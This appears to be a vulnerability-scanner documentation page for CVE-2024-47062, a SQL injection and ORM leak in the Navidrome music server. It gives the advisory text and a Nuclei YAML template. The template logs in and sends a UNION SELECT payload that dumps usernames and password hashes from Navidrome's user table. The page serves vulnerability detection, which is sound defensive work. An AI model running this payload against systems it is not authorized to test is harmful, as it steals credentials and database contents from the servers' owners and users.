Navidrome < 0.53.0 - Authenticated SQL Injection
ID: CVE-2024-47062
Severity: critical
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2024,sqli,orm-leak,navidrome,authenticated
Description
Section titled “Description”Navidrome is an open source web-based music collection server and streamer. Navidrome automatically adds parameters in the URL to SQL queries. This can be exploited to access information by adding parameters like password=... in the URL (ORM Leak). Furthermore, the names of the parameters are not properly escaped, leading to SQL Injections. Finally, the username is used in a LIKE statement, allowing people to log in with % instead of their username. When adding parameters to the URL, they are automatically included in an SQL LIKE statement (depending on the parameter’s name). This allows attackers to potentially retrieve arbitrary information. For example, attackers can use the following request to test whether some encrypted passwords start with AAA. This results in an SQL query like password LIKE 'AAA%', allowing attackers to slowly brute-force passwords. When adding parameters to the URL, they are automatically added to an SQL query. The names of the parameters are not properly escaped. This behavior can be used to inject arbitrary SQL code (SQL Injection). These vulnerabilities can be used to leak information and dump the contents of the database and have been addressed in release version 0.53.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.
YAML Source
Section titled “YAML Source”id: CVE-2024-47062
info: name: Navidrome < 0.53.0 - Authenticated SQL Injection author: iamnoooob,rootxharsh,pdresearch severity: critical description: | Navidrome is an open source web-based music collection server and streamer. Navidrome automatically adds parameters in the URL to SQL queries. This can be exploited to access information by adding parameters like `password=...` in the URL (ORM Leak). Furthermore, the names of the parameters are not properly escaped, leading to SQL Injections. Finally, the username is used in a `LIKE` statement, allowing people to log in with `%` instead of their username. When adding parameters to the URL, they are automatically included in an SQL `LIKE` statement (depending on the parameter's name). This allows attackers to potentially retrieve arbitrary information. For example, attackers can use the following request to test whether some encrypted passwords start with `AAA`. This results in an SQL query like `password LIKE 'AAA%'`, allowing attackers to slowly brute-force passwords. When adding parameters to the URL, they are automatically added to an SQL query. The names of the parameters are not properly escaped. This behavior can be used to inject arbitrary SQL code (SQL Injection). These vulnerabilities can be used to leak information and dump the contents of the database and have been addressed in release version 0.53.0. Users are advised to upgrade. There are no known workarounds for this vulnerability. reference: - https://github.com/advisories/GHSA-58vj-cv5w-v4v6 - https://github.com/navidrome/navidrome/security/advisories/GHSA-58vj-cv5w-v4v6 - https://nvd.nist.gov/vuln/detail/CVE-2024-47062 classification: epss-score: 0.00043 epss-percentile: 0.09612 metadata: verified: true max-request: 2 shodan-query: html:"content="Navidrome"" tags: cve,cve2024,sqli,orm-leak,navidrome,authenticated
variables: username: "{{username}}" password: "{{password}}"
http: - raw: - | POST /auth/login HTTP/1.1 Host: {{Hostname}} content-type: application/json
{"username":"{{username}}","password":"{{password}}"}
extractors: - type: json name: auth_token internal: true part: body json: - '.token'
- raw: - | GET /api/album?_end=36&_order=DESC&_sort=recently_added&_start=0&1+like+1)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,(select+group_concat(concat(user_name,':',password))from+user),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49--=123 HTTP/1.1 Host: {{Hostname}} x-nd-authorization: Bearer {{auth_token}}
extractors: - type: regex group: 1 part: body regex: - 'sql/driver: couldn''t convert \\\"(.*?)\\\"'# digest: 4b0a00483046022100f25d194b7531e0d4c8e2ec23e361b2a3343cdcaad9685228e8c8d3e94315d8a5022100b53202ac709be63c952cfb0ee96cbc5b5ca68ab8e858f295515fae3f7c5ba745:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-47062.yaml"